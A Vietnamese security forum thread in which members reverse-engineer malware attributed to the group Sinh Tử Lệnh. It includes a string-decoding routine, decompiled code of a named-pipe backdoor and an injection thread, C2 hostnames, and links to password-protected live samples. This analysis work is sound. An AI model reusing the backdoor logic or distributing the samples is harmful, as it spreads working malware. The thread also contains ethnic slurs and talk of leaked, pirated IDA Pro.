Em thấy có mấy chỗ nữa call Decode nhưng mà chỗ nào put thẳng src vào thì em decode đuơc, chỗ nào gọi qua ref đến register thì em chịu, chưa tìm được src nó trỏ đến đâu. đây là đoạn fasm em dùng để decode, bác nào tìm được ref thì cho vào chạy :D

format PE console ;CRT fix 'msvcrt.dll' include 'win32ax.inc' .data src dd 9A919A98h, 0D1939E8Dh, 0D0939287h, 0 s2 dd 0DF9ACFD1h, 8BD3DF8Bh, 93DFDF8Dh, 0D1AA9E88h, 0DFD3D1F5h, 0DA9C9A97h, 938CCF9Ah, 0CED08B85h dd 0D19CCE91h, 91B99092h, 969B87ACh, 0D19AD0F2h, 0BED0AAD1h, 8EDFABF5h, 0C5B28790h, 0C9BCCDABh dd 0F597D093h, 91D296CEh, 90DA8F96h, 0DFC2C590h, 0B8CC8D90h, 9391D5CCh, 90B78FC5h, 938FABF2h dd 9CCBCE8Bh, 9ED7969Ah, 8DBC9AC5h, 8C8B8CC4h, 0D5CDF2C9h, 9C918BA8h, 0DFD19C8Ch, 0CE9A96D3h dd 9EC491CFh, 968C93CFh, 9092C4C5h, 0F2CCF59Ch, 87C4C6C6h, 0B8DFBE98h, 909288C2h, 90CFAFDFh dd 8BCA96D1h, 0AA90DFB7h, 8C9391D0h, 0CFCE8C87h, 0F2D291DFh, 9BC4D6BAh, 0AB8BDFD4h, 8FDFF5D0h dd 0CFF2D09Eh, 0A890918Bh, 9399DF8Fh, 96C48E89h, 0D1F5D19Ah, 8B9296D0h, 0C794DF9Ah, 87939EB1h dd 0 ;56*4 s3 dd 0B2FF99FFh dd 90FFA3FFh dd 0BCFF8BFFh dd 9EFF8CFFh dd 90FFB2FFh dd 0B2FF9BFFh dd 0D1FF8DFFh dd 9CFFA3FFh dd 8BFF97FFh dd 97FF96FFh, 5 dup(0) dst db 2048 dup(0) .code start: stdcall Decode,9108Dh,0D9E61h,s3,dst,10*4 invoke ExitProcess,0 Decode: db 8Bh,44h,24h,04h,56h,8Bh,74h,24h,18h db 33h,0C9h,99h,0F7h,0FEh,85h,0F6h,7Eh db 2Bh,53h,8Bh,5Ch,24h,10h,55h,8Bh,6Ch db 24h,18h,57h,8Bh,7Ch,24h,20h,0Ch,0FFh db 2Ah,04h,29h,88h,04h,3Ah,8Dh,04h,1Ah db 99h,0F7h,0FEh,41h,3Bh,0CEh,7Ch,0EDh db 5Fh,5Dh,5Bh,33h,0C0h,5Eh,0C2h,14h,00h .end start

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

Tính post tiếp nhưng tới lúc decode xong lại thấy ngờ ngợ, hình như là, khoãng 50%, wbmain.dll có lẽ không phải của STL, nhưng cũng có thể. Bà con ai nhớ cái: www.adobe-upgrade.com và AdobeUpdateManager.exe không ? AdobeUpdateManager.exe hình như là 1 con Bot, còn server adobe-upgrade.com thì down lâu rồi, whois, google không thấy. Không lẽ tui đi sai hướng. Hiện tại trong đống virus database lưu trên máy tui, thấy rõ 2 trường phái coding khác nhau. Version của 2 đám này cũng lung tung hết, không xác định được. Nếu thật là sai hướng thì xin lỗi anh em, đã làm mất thời gian của anh em theo dõi tọpic này.

Dù gì thì xem hình vẫn rõ ràng, dễ hiểu hơn là post đống ASM hay C code, phải không anh em ? Windows\System32\uxtheme.dll không phải là malware, mục đích của coder của malware wbmain.dll này là patch đường dẫn full của wbmain.dll trong PEB.Ldr link list thành path của uxtheme.dll thôi. Hoàn toàn không ngoài mục đích che dấu wbmain.dll trong các trình Process viewers. Nếu wbmain.dll của mấy đại ca STL thì em nói cái uxtheme.dll này đúng không vậy, chứ không mấy anh chê em RCE nửa mùa, không tới nơi tới chốn nữa. PS: Em chỉ dùng x86-emulator để decode các string thôi, không cần đao to búa lớn. Chi tiết sử dụng x86-emulator, bà con reversers VN ta xem trong cuốn "IDA Pro Book" gì đó. Khoe một chút: Thấy font và color của OllyDbg em đang dùng đẹp không. Font: Raize, color: Alex Black.

RCE đám virus của Sinh Tử Lệnh.

WinDak — GMT

Tớ chỉ tò mò google vài cái thì phát hiện ra trang này : http://www.threatexpert.com/report.aspx?md5=fa9bfec1cbdbfec643021bf6bd943034 Chú ý item 7 và 10: %Windir%\ime\HARDKBD.DLL %System%\wbem\wbmain.dll Không rõ là có đúng đây là của bọn STL viết như TQN nói không, vì có vẻ con malware này đã được publish ở đâu đó ?

RCE đám virus của Sinh Tử Lệnh.

PXMMRF — GMT

TQN wrote:

Tính post tiếp nhưng tới lúc decode xong lại thấy ngờ ngợ, hình như là, khoãng 50%, wbmain.dll có lẽ không phải của STL, nhưng cũng có thể. Bà con ai nhớ cái: www.adobe-upgrade.com và AdobeUpdateManager.exe không ? AdobeUpdateManager.exe hình như là 1 con Bot, còn server adobe-upgrade.com thì down lâu rồi, whois, google không thấy. Không lẽ tui đi sai hướng. Hiện tại trong đống virus database lưu trên máy tui, thấy rõ 2 trường phái coding khác nhau. Version của 2 đám này cũng lung tung hết, không xác định được. Nếu thật là sai hướng thì xin lỗi anh em, đã làm mất thời gian của anh em theo dõi tọpic này.

AdobeUpdateManager.exe có nhúng vào một bot. Việc này McAfee phát hiện cách đây khoảng nửa năm gì đó. McAfee có thông báo trên một blog của họ và tôi có hai ý kiến trong phần comment. wbmain.dll thì Kaspersky đã phát hiện cách đây vài tháng gì đó và phân loại nó là một downloader Trojan (Trojan.Downloader.Win32.Agent.ffxc), PE compact file. Hãng Ikarus cũng đã detect ra con này trước đây. Hardkbd.dll và wbmain.dll đã xuất hiện từ năm 2007 và đươc sử dung như một file "thông dụng-hiệu quả" để nhét vào nhiều loai Trojan khác nhau. STL và các hacker Trung quốc nói chung thích "sử dụng" các file này và cải tiến chúng trong quá trình sử dụng. Thí dụ gần đây chúng đưa vào các "Keymaker" để tạo ra các key-serial no. dùng cho 1 chương trình cài đặt VM (máy ảo) trên một hệ thống Windows. Gần đây AntiVir (tác già phần mềm nổi tiếng Antivirus Avira) và hãng Dr.Web (một hãng IT và Antivirus đang lên của Nga-Liên xô cũ) cũng đã detect ra Hardkbd.dll như là một Trojan Quá trình compile và disassembling hai file dll nói trên của TQN khá hay và mang lại nhiều thông tin hữu ích. Cám ơn TQN

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

Cảm ơn anh PXMMRF đã khen. Cho em "nổ" một chút: Em biết code VC++ và System Programming từ hồi lúc đám STL này còn ở truồng tắm mưa. Debug code nát nước. Mấy cái code C/C++ em đọc như đọc sách chứ có khó khăn gì đâu. Cái nào không chắc ăn mới lôi ra debug. Thậm chí code Delphi, VB thì khỏi bàn. Vậy mà, hu hu, em bị chúng chê em RCE, coding nữa mùa. Bởi vậy em mới nói với tụi nó: khi nào cần học code System, malware hay review code thì khăn gói qua nhà em. Bảo đãm em sẽ dạy cho, không bị "đập". Các bạn xem lại hình build day của hardkbd.dll và wbmain.dll mà em đã post. Có thể cả hai đều do các virus maker tạo ra hay tụi STL và các đám hacker khác share nhau, mua source code (source này cho em cũng không thèm, bug tùm lum, code như shit, làm sao bằng mấy anh Bờ Kờ được). À quên, em vẫn có nhu cầu IDA 6.x nhé, bà con nào có share cho em đi. 10 chầu nhậu, em út luôn. PS: Hi rongchaua, lâu quá không gặp. Thấy em vào xem topic này anh vui lắm. Anh em REA. Vào giúp anh một tay đi. Khi nào tụi STL này code malware = .NET thì dành hết cho em nhé !

RCE đám virus của Sinh Tử Lệnh.

PXMMRF — GMT

TQN wrote:

Tính post tiếp nhưng tới lúc decode xong lại thấy ngờ ngợ, hình như là, khoãng 50%, wbmain.dll có lẽ không phải của STL, nhưng cũng có thể. Bà con ai nhớ cái: www.adobe-upgrade.com và AdobeUpdateManager.exe không ? AdobeUpdateManager.exe hình như là 1 con Bot, còn server adobe-upgrade.com thì down lâu rồi, whois, google không thấy. Không lẽ tui đi sai hướng. Hiện tại trong đống virus database lưu trên máy tui, thấy rõ 2 trường phái coding khác nhau. Version của 2 đám này cũng lung tung hết, không xác định được. Nếu thật là sai hướng thì xin lỗi anh em, đã làm mất thời gian của anh em theo dõi tọpic này.

AdobeUpdateManager.exe có nhúng vào một bot. Việc này McAfee phát hiện cách đây khoảng nửa năm gì đó. McAfee có thông báo trên một blog của họ và tôi có hai ý kiến trong phần comment. wbmain.dll thì Kaspersky đã phát hiện cách đây vài tháng gì đó và phân loại nó là một downloader Trojan (Trojan.Downloader.Win32.Agent.ffxc), PE compact file. Hãng Ikarus cũng đã detect ra con này trước đây. Hardkbd.dll và wbmain.dll đã xuất hiện từ năm 2007 (tác giả đầu tiên có lẽ là các hacker Mỹ hay Nga) và đươc sử dung như một file "thông dụng-hiệu quả" để nhét vào nhiều loai Trojan khác nhau. STL và các hacker Trung quốc nói chung thích "sử dụng" các file này và cải tiến chúng trong quá trình sử dụng. Thí dụ gần đây chúng đưa vào các "Keymaker" để tạo ra các key-serial no. dùng cho 1 chương trình cài đặt VM (máy ảo) trên một hệ thống Windows. Gần đây AntiVir (tác già phần mềm nổi tiếng Antivirus Avira) và hãng Dr.Web (một hãng IT và Antivirus đang lên của Nga-Liên xô cũ) cũng đã detect ra Hardkbd.dll như là một Trojan Quá trình compile và disassembling hai file dll nói trên của TQN khá hay và mang lại nhiều thông tin hữu ích. Cám ơn TQN

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

hardkbd.dll thì em đã up cho Kaspersky lab để phân tích rồi. Em cũng gởi kèm file IDA .idb của em luôn. Tiếp theo, chúng ta sẽ tiếp tục với đám bot của tụi STL này. Đám bot này Zorro gởi cho tui, không biết sao Zorro lại dính nó. Và chắc chắn đám bot này là của tụi STL, không chạy đi đâu được. Dưới đây là file config của đám bot này:

Dien dan X-cafe - Ton trong su khac biet tren tinh thanh duy ly

Diễn đàn X-Cafe - Tôn trọng sự khác biệt trên tinh thần duy lý

KAV đã phát hiện ra toàn bộ wscntfy.* này là Vecebot, vì vậy em phải tạm tắt KAV Mục đích cuối cùng của em là tìm cho ra thằng nào up msdata.vxd chứa keypress của em lên cho tụi STL để nó hai lần vào lấy account HVA, Yahoo của em.

RCE đám virus của Sinh Tử Lệnh.

PXMMRF — GMT

TQN wrote:

hardkbd.dll thì em đã up cho Kaspersky lab để phân tích rồi. Em cũng gởi kèm file IDA .idb của em luôn. Tiếp theo, chúng ta sẽ tiếp tục với đám bot của tụi STL này. Đám bot này Zorro gởi cho tui, không biết sao Zorro lại dính nó. Và chắc chắn đám bot này là của tụi STL, không chạy đi đâu được. Dưới đây là file config của đám bot này:
Dien dan X-cafe - Ton trong su khac biet tren tinh thanh duy ly

Diễn đàn X-Cafe - Tôn trọng sự khác biệt trên tinh thần duy lý

KAV đã phát hiện ra toàn bộ wscntfy.* này là Vecebot, vì vậy em phải tạm tắt KAV Mục đích cuối cùng của em là tìm cho ra thằng nào up msdata.vxd chứa keypress của em lên cho tụi STL để nó hai lần vào lấy account HVA, Yahoo của em.

Các file .vxd là của Microsoft, sản phẩm của lão Bill Gate từ những năm 95, 96 gì đó và chúng đã có trong Windows 95, 98.... Tuy nhiên tôi không thấy Microsoft có "ban hành" một file .xvd nào có tên là msdata. Rõ ràng đây là một file của STL, như TQN đã nhận định. File .xvd thuộc loai file liên quan đến "Virtual Device Driver" (nhưng sao Ms không đặt đuôi file là .vdd nhỉ?. Hì hì). File này hỗ trợ việc chạy một file .exe trong một quá trình liên quan đến Device Drivers, thí dụ quá trình cài đặt các Driver của một số hardware trên hệ thống hay update driver trên mang. Trong Win XP (SP3) và Win 2K3 của tất cả các máy tôi đang dủng và cài đặt, config. cho anh em cơ quan ... tôi không thấy sự hiện diện của file msdata.vxd. (Mà hầu hết hay tất cả các Win này đều là dùng chùa cả ... Hì hì. Nghèo nên không đủ tiền mua). Tôi chỉ thấy có file là dsound.vxd. File này dường như cần thiết để chứng tỏ hệ thống có thể cài đươc vào một loai GAME nào đó (DX game chăng?) TQN xem vừa qua có cài một soft. (có crack) nào đó mà quá trình cài có liên quan đến Virtual Device Driver không? Thí dụ một chương trình tạo máy ảo trên nền Windows chẳng hạn? (Dường như STL biết tìm cách mời chào những món hàng cao cấp cho những người có kỹ thuật cao cấp và chỉ chờ cơ hôi họ quá bận bịu vì công việc, nên có lúc vô tình dùng món hàng độc. Thâm như T... là vậy)

RCE đám virus của Sinh Tử Lệnh.

conmale — GMT

TQN phân vân về "AdobeUpdateManager.exe" nên anh chen vô một tí. "AdobeUpdateManager.exe" có liên quan với STL hay không thì đây là chuyện còn chưa rõ 100% nhưng có một số thông tin đáng chú ý: 1. AdobeUpdateManager.exe chính là một phần của VulcanBot mà đám McAfee đã công bố hồi tháng 4 năm 2010 và vpskeys, bộ gõ tiếng Việt của nhóm chuyên gia Việt Nam bị thay đổi và hàng ngàn người dùng bị dính chấu. Theo thông tin (bên trong) của một người bạn trong nhóm VPS cho biết, máy chủ của VPS bị thâm nhập và có nguồn IP đi từ VN. 2. VulcanBot trong thời hoạt động trỏ về 7 hosts khác nhau, trong đó có một dynamic host sử dụng dyn dns có tên là: tyuqwer.dyndns.org. Theo cache lưu của nhiều nơi trên Internet, tyuqwer.dyndns.org có IP là 112.78.5.79, một IP thuộc "Công ty Cổ phần Dich vụ dữ liệu Trực tuyến" có văn phòng chính ở Q.3, TPHCM. 3. Hiện nay một số hosts trên không còn hoạt động, một số hosts khác trỏ về 209.200.249.62, một server thuộc data center LUNARPAGES ở Mỹ. Đây là nhóm IP bị blacklisted trên hầu như các thiết bị bảo mật. 4. Domain name: update-adobe.com hiện do đám onlineNIC ở HK, CN quản lý. STL đã dời hầu hết các tên miền quan trọng của họ về registrar này ở CN. Nếu đám tạo VulcanBot này cũng chọn OnlineNIC này để lưu trú như STL thì quả là thú vị ;). PS: Ngân ơi, để anh gởi em thêm vài món khá mới để em RE tiếp cho vui cửa vui nhà ;).

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

"Công ty Cổ phần Dich vụ dữ liệu Trực tuyến", thằng này nằm sát nhà em, cách chưa tới 100m đâu, chiều nào em đón hai con heo con của em đi học cũng đi qua nó. Nó ở BT chứ không phải Q.3 đâu anh. Có phải là tên QCV không anh em STL ? Ặc ặc, bà xã em la làng, anh vào SG mấy ngày rồi, ngồi lỳ trên máy, nốc bia liên tục kìa ! Anh mà gởi nữa chắc em đi die luôn. Ngày mai em phải đi làm rồi. Máy móc, công trình... 2 anh PXMMRF: File msdata.vxd chỉ là giả danh thôi anh, nó chỉ là file text bình thường, toàn bộ nội dung của nó được xor với 0x6F. Anh xem lại code ASM mà em đã post.

RCE đám virus của Sinh Tử Lệnh.

PXMMRF — GMT

conmale wrote:

. .................................................... 2. VulcanBot trong thời hoạt động trỏ về 7 hosts khác nhau, trong đó có một dynamic host sử dụng dyn dns có tên là: tyuqwer.dyndns.org. Theo cache lưu của nhiều nơi trên Internet, tyuqwer.dyndns.org có IP là 112.78.5.79, một IP thuộc "Công ty Cổ phần Dich vụ dữ liệu Trực tuyến" có văn phòng chính ở Q.3, TPHCM. ........................................................... 4. Domain name: update-adobe.com hiện do đám onlineNIC ở HK, CN quản lý. STL đã dời hầu hết các tên miền quan trọng của họ về registrar này ở CN. Nếu đám tạo VulcanBot này cũng chọn OnlineNIC này để lưu trú như STL thì quả là thú vị ;). PS: Ngân ơi, để anh gởi em thêm vài món khá mới để em RE tiếp cho vui cửa vui nhà ;).

(2) Bọn này (chắc là STL) hơi buồn cười. Sử dụng tên miền năng động (dynamic system domain -dynamic host) cho một webserver cốt là để có thể thiết lập một webserver với một WAN dynamic IP, khi không có một WAN static IP. Đây cũng là cách để giấu (một cách hiệu quả) vị trí địa lý đặt webserver. Thế mà các bác ấy lại config. "dyndns update (IP) soft" với một IP tĩnh, dù rằng trên soft nói trên cũng có option này. Ngu ngơ quá đi thôi. Chắc phải vào HVA forum đọc thêm vài bài. (4) Trụ sở tại HK (China) của các bác này còn có những chuyện bí mật khác. Hì hì Registrar của cái domain SMARTSHOW.INFO của STL mà TQN mới phát hiện ra cũng là OnlineNIC

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

Đúng là em search Smartshow.info thì lòi ta 1 đống trang của tụi "Tàu khựa". Bọn STL này có vẻ thích chơi với Tàu. Bán nước hả tụi mày !? Nhờ anh em admin, mod lưu lại toàn bộ image và file em up lên mediafire. Đề phòng tụi nó lại cướp pass của em vào mediafire và imageshack xoá hết. Em thì rút kinh nghiệm, vừa lưu HD, vừa lưu USB mang theo người. Chiều giờ vào mediafire chậm quá, em up toàn bộ IDA idb file của hardkbd.dll và wbmain.dll. wbmain.idb hơi bị bự do ida-x86emu add một mớ segment: stack, heap, peb, teb, idt, gdt... vào. Quan trọng kế tiếp là đám Vecebot của Zorro. RCE đám malware này, chúng ta sẽ tìm hiểu được phương thức tấn công, URL của bot host mà đám bot này nhận lệnh. Em cũng up lên meidafire luôn. Trong đống này em mới RCE một số thôi Anh em RE khác vào phụ em với. PS: Anh em reversers khác như lammer, hacnho, kienmanowar, rongchaua, Merc, Thug... đâu hết rồi, vào cùng tham gia với em cho vui chứ. Cứ mạnh tay: Oh, TQN ơi, mày sai chổ này nè, mày sót chổ kia kìa... Vậy mới vui cửa vui nhà chứ, toàn mình em độc diễn không à, buồn quá. Em không tự ái đâu, trứng cút còn có trứng lộn mà. Quái, chiều giờ vào mediafire để up vecebot mà không được ??? Giờ cũng vào được rồi: http://www.mediafire.com/?xzt7i9i4s9m7juj http://www.mediafire.com/?1vh7qdcf3ccsi81 Password như cũ: malware

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

Em gần như chắc chắn 80% nhóm viết malware wbmain.dll và nhóm viết hardkdb.dll, file .exe mà shellcode của file Word của STL là 1. Em đang RCE file .exe mà shellcode download về hồi đó. File exe này dùng khá nhiều kỹ thuật antidebug, detect DeepFreeze, VMWare, VirtualBox. Có một điều đặc biệt, coder của update.exe này dùng parameter 123456789 để test và kiểm tra Windows Key của chính máy mình:

File Exe này STL coder cũng build = VC++ 2010, dùng pure C, không dùng C++ như wbmain.dll, coding style là một, y chang với hardkbd.dll. Nhưng trong file EXE này, ta lại gặp hàm decode quen thuộc của wbmain.dll (1 trong 3 hàm decode của nó):

Điều này chứng tỏ (hỏi hay ngã ha) điều gì ? Dùng chung 1 thư viện hay share code lẫn nhau ? PS: Mấy anh STL giỏi quá, em ngưỡng một thật. Thôi bây giờ thay vì DDOS, hack vào các trang Hải Ngoại, các anh hãy DDOS, hack vào mấy website của bọn Ba tàu đi. Được không mấy anh ??????? Coi như chứng tỏ lòng yêu nước đấy. Dán cái hình STL vào mặt tụi nó, thêm chữ VietNam nữa nha ! À mà quên, hồi đó, lúc EXE này run, em capture network traffic, thấy nó connect tới host này:

http://79.49.2d.static.xlhost.com eNET Inc. 3000 E. Dublin Granville Road Columbus, OH 43231 US Domain Name: XLHOST.COM ------------------------------------------------------------------------ Promote your business to millions of viewers for only $1 a month Learn how you can get an Enhanced Business Listing here for your domain name Learn more at http://www.NetworkSolutions.com/ ------------------------------------------------------------------------ Administrative Contact, Technical Contact: Kharazi, Saeed ski@EE.NET eNET Inc. 3000 East Dublin-Granville Road Columbus, OH 43231 US (614) 794-5971 fax: (614) 794-9016 Record expires on 05-Jan-2021. Record created on 05-Jan-2000. Database last updated on 3-Jun-2011 01:35:13 EDT. Domain servers in listed order: DNS2.EE.NET 206.222.1.2 DNS3.EE.NET 206.222.1.3

Cha, host này vẫn còn sống à, vừa last update hôm nay luôn. Mấy anh giàu quá, đk host tùm lum hết. PS: Mọi ý kiến trao đổi với tui, các bạn có thể PM hay gởi vào hòm thư: truong.quoc.ngan@gmail.com của mình. Hộp thư Yahoo thì để riêng.

RCE đám virus của Sinh Tử Lệnh.

conmale — GMT

Hì hì, TQN ngó vậy mà cũng hài thiệt đó :-) . Những traffic đi tới xlhost.com là traffic em bot đi nhận mệnh lệnh đó. smartshow.info trước đây cũng đã từng nằm trên xlhost.com PS: anh đang tìm cách "thương lượng" cái IDA Pro 6.1 cho em. Đắt quá nên cần phải coi thử có cách nào giảm bớt chi phí không.

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

Cảm ơn anh conmale, mua không nổi đâu, "IDA Pro Standard Licenses start at 539 USD or 419 EUR. IDA Pro Advanced Licenses start at 1059 USD / 809 EUR". Mà có đặc điểm là có mua tụi nó cũng không bán, tụi nó sợ leak ra ngoài. Tụi nó check khách hàng kỹ lắm, phải uy tín, là công ty bảo mật thì mới bán. Tui đã up lên mediafire file exe mà file word này drop xuống, đồng thời khi nó run, nó sẽ extract ra 2 file DLL: dao360.dll.mui và ipripv6.dll. 2 thằng này chính là 2 file quan trọng nhất của nhóm malware này. http://www.mediafire.com/?ldgjlc7z88lambb Password: malware File dropper exe không nhúng 2 dll vào trong resource, chúng cùng DrWatson.exe được nén rồi nhúng hết vào data section. Khi run thì extract ra %Temp%, dùng Zlib để uncompress. Đây là một cách mà STL dùng để qua mặt các AV. File DrWatson.exe là file của STL, không phải file của MS. Nó được dropper .exe extract ra %Temp%\update.tmp dưới dạng zip format, unzip ra (dùng zlib) thành file DrWatson.exe rồi run. Cả hai file này đều được dropper .exe xoá ngay sau khi run. Khối lượng các file cần RCE rất lớn, tui up lên mediafire để mọi người cùng tham gia RCE và phân tích, thảo luận. Tụi STL phải thấy là, không phải cái gì tụi nó làm thì không ai biết hết.

RCE đám virus của Sinh Tử Lệnh.

secmask — GMT

Em tham gia tí :D Code:

.code:10001D00 ; DWORD __stdcall StartAddress(LPVOID)
.code:10001D00 StartAddress    proc near               ; DATA XREF: ThreadAProc+23o
.code:10001D00                 push    ebp
.code:10001D01                 mov     ebp, esp
.code:10001D03                 and     esp, 0FFFFFFF8h ; Logical AND
.code:10001D06                 push    ecx
.code:10001D07                 push    esi
.code:10001D08                 mov     esi, ds:Sleep   ; Suspends the execution of the current thread for at least the specified interval.
.code:10001D0E                 mov     edi, edi
.code:10001D0E
.code:10001D10
.code:10001D10 loc_10001D10:                           ; CODE XREF: StartAddress+19j
.code:10001D10                 call    readPipeTokenExec ; Token input from pipeline using delimiter '\09'
.code:10001D10                                         ; in format type|libname|parameter
.code:10001D10
.code:10001D15                 push    100             ; dwMilliseconds
.code:10001D17                 call    esi ; Sleep     ; Indirect Call Near Procedure
.code:10001D17
.code:10001D19                 jmp     short loc_10001D10 ; Jump
.code:10001D19
.code:10001D19 StartAddress    endp

Code:

// Token input from pipeline using delimiter '\09'
// in format type|libname|parameter
int __cdecl readPipeTokenExec()
{
  void *v0; // eax@1
  void *v1; // ebp@1
  int tokenCnt; // edi@4
  wchar_t *aToken; // esi@4
  wchar_t *v4; // eax@8
  const WCHAR v5; // cx@9
  __int16 *v6; // eax@12
  __int16 v7; // cx@13
  char v9; // [sp+10h] [bp-2874h]@1
  int exeType; // [sp+14h] [bp-2870h]@1
  DWORD NumberOfBytesRead; // [sp+18h] [bp-286Ch]@1
  wchar_t *Context; // [sp+1Ch] [bp-2868h]@1
  struct _PROCESS_INFORMATION ProcessInformation; // [sp+20h] [bp-2864h]@1
  struct _STARTUPINFOW StartupInfo; // [sp+30h] [bp-2854h]@1
  const WCHAR LibFileName; // [sp+78h] [bp-280Ch]@1
  char v16; // [sp+7Ah] [bp-280Ah]@1
  __int16 Buffer; // [sp+878h] [bp-200Ch]@1
  char v18; // [sp+87Ah] [bp-200Ah]@1
  __int16 createProcessParam; // [sp+1078h] [bp-180Ch]@1
  char v20; // [sp+107Ah] [bp-180Ah]@1
  WCHAR CommandLine; // [sp+1878h] [bp-100Ch]@1
  char v22; // [sp+187Ah] [bp-100Ah]@1
  unsigned int v23; // [sp+287Ch] [bp-8h]@1

  v23 = (unsigned int)&v9 ^ dword_1001201C;
  Buffer = 0;
  memset(&v18, 0, 0x7FEu);
  LibFileName = 0;
  memset(&v16, 0, 0x7FEu);
  createProcessParam = 0;
  memset(&v20, 0, 0x7FEu);
  CommandLine = 0;
  memset(&v22, 0, 0xFFEu);
  NumberOfBytesRead = 0;
  exeType = 0;
  Context = 0;
  memset(&StartupInfo.lpReserved, 0, 0x40u);
  ProcessInformation.hProcess = 0;
  ProcessInformation.hThread = 0;
  ProcessInformation.dwProcessId = 0;
  ProcessInformation.dwThreadId = 0;
  StartupInfo.cb = 68;
  StartupInfo.dwFlags = 1;
  StartupInfo.wShowWindow = 0;
  v0 = (void *)mCreatePipe((const WCHAR *)dword_NamedPipe);
  v1 = v0;
  if ( v0 != (void *)-1 && ConnectNamedPipe(v0, 0) )
  {
    memset(&Buffer, 0, 2048u);
    memset((void *)&LibFileName, 0, 0x800u);
    memset(&createProcessParam, 0, 0x800u);
    memset(&CommandLine, 0, 0x1000u);
    while ( ReadFile(v1, &Buffer, 0x400u, &NumberOfBytesRead, 0) )
    {
      aToken = wcstok_s((wchar_t *)&Buffer, &Delim, &Context);
      tokenCnt = 0;
      while ( aToken )
      {
        if ( tokenCnt )
        {
          if ( tokenCnt == 1 )
          {
            v4 = aToken;
            do
            {
              v5 = *v4;
              *(wchar_t *)((char *)v4 + (char *)&LibFileName - (char *)aToken) = *v4;
              ++v4;
            }
            while ( v5 );
          }
          else
          {
            if ( tokenCnt == 2 )
            {
              v6 = (__int16 *)aToken;
              do
              {
                v7 = *v6;
                *(__int16 *)((char *)v6 + (char *)&createProcessParam - (char *)aToken) = *v6;
                ++v6;
              }
              while ( v7 );
            }
          }
        }
        else
        {
          exeType = _wtoi(aToken);
        }
        aToken = wcstok_s(0, &Delim, &Context);
        ++tokenCnt;
        Sleep(0);
      }
      switch ( exeType )
      {
        case 1:
          if ( IsExistPEFile(&LibFileName) )
          {
            wrap_vprintf((const char *)L"%s %s", &LibFileName, &createProcessParam);
            CreateProcessW(0, &CommandLine, 0, 0, 0, 0x8000020u, 0, 0, &StartupInfo, &ProcessInformation);
          }
          break;
        case 2:
          if ( isExist_PE_Dll_File(&LibFileName) )
            LoadLibraryW(&LibFileName);
          break;
        case 99:
          goto LABEL_23;
      }
      memset(&Buffer, 0, 0x800u);
      memset((void *)&LibFileName, 0, 0x800u);
      memset(&createProcessParam, 0, 0x800u);
      memset(&CommandLine, 0, 0x1000u);
    }
LABEL_23:
    DisconnectNamedPipe(v1);
  }
  DisconnectNamedPipe(v1);
  if ( v1 )
    CloseHandle(v1);
  return 0;
}

Thread này tạo vòng lặp, đọc namedpipe "\\\\.\\pipe\\NannedPipe" lấy tham số để gọi chạy process mới hoặc load DLL. Mỗi dòng đọc được từ pipeline sẽ được tách thành 3 tokens. Token1: giá trị = 1 ứng với file executable, giá trị = 2 ứng với file DLL. Token2: đường dẫn đến executable hoặc DLL. Token3: parameter để chạy chuơng trình. token được phân tách dùng kí tự '\09' đây có thể là một file che dấu dưới dạng chuơng trình tin cậy, duy trì lâu dài để spawn ra các process mới. Thread thứ 2 làm nhiệm vụ duyệt danh sách process, dùng các kĩ thuật dạng CreateRemoteThread để inject module sang: Code:

int __cdecl ThreadAProc()
{
  DWORD v0; // edi@1
  DWORD v1; // esi@1
  FARPROC IsWow64Process_; // ebx@3
  HMODULE kernelModuleHandle; // eax@3
  HANDLE currentProcess; // eax@4
  int encVersion; // eax@5
  int isWow64; // [sp+Ch] [bp-4h]@3

  v0 = 0;
  v1 = 0;
  if ( hModule )
    sub_10002900();
  decodeBuildFilePath();
  CreateThread(0, 0, StartAddress, 0, 0, 0);
  isWow64 = 0;
  kernelModuleHandle = GetModuleHandleW(L"kernel32");
  IsWow64Process_ = GetProcAddress(kernelModuleHandle, "IsWow64Process");
  if ( IsWow64Process_ )
  {
    currentProcess = GetCurrentProcess();
    ((void (__stdcall *)(HANDLE, int *))IsWow64Process_)(currentProcess, &isWow64);
  }
  encVersion = getEncodedOSVersion();
  if ( !isWow64 )
  {
    if ( encVersion == 4 || encVersion == 6 || encVersion == 7 )
      v0 = sub_100020E0();
    scheJobNtXP20037((void *)v0);
    while ( 1 )
    {
      Sleep(600000u);
      scheJobNtXP20037((void *)v0);
    }
  }
  if ( encVersion == 8 || encVersion == 5 )
  {
    while ( 1 )
    {
      Sleep(600000u);
      v1 = scheJobV8n5(v1);
    }
  }
  return 0;
}

RCE đám virus của Sinh Tử Lệnh.

bolzano_1989 — GMT

IDA 6.1 released (not cracked) - EXETOOLS FORUM http://forum.exetools.com/showthread.php?t=13428 bolzano_1989 thấy anh TQN đã có rồi :) .

RCE đám virus của Sinh Tử Lệnh.

quangredlight — GMT

Không biết các bác nhận xét thế nào chứ HexRay vẫn là 1.1 thì em dùng IDA 5.5 cho lành. Em chỉ phân tích tĩnh là chính, chả dùng mấy tính năng nâng cao của nó. Nếu có HexRay mới thì ngon. Mới Leak hôm nay mà cư dân mạng download nhộn nhịp quá :D

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

NannedPipe, Nanned: các bạn có biết nghĩa hay phát âm của ngôn ngữ nào có từ Nanned này không ? Em google hết thì chỉ thấy Google khuyên từ này: Nanning (Nam Ninh - Tàu khựa).

RCE đám virus của Sinh Tử Lệnh.

van7hu — GMT

TQN wrote:

NannedPipe, Nanned: các bạn có biết nghĩa hay phát âm của ngôn ngữ nào có từ Nanned này không ? Em google hết thì chỉ thấy Google khuyên từ này: Nanning.

Có lẽ nào là "Named", "NamedPipe" không anh? anyway, chẳng biết gì cả, thấy bài viết của anh hay quá, mỗi tội không đủ trình để tham khảo, mong anh cố gắng viết tiếp.

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

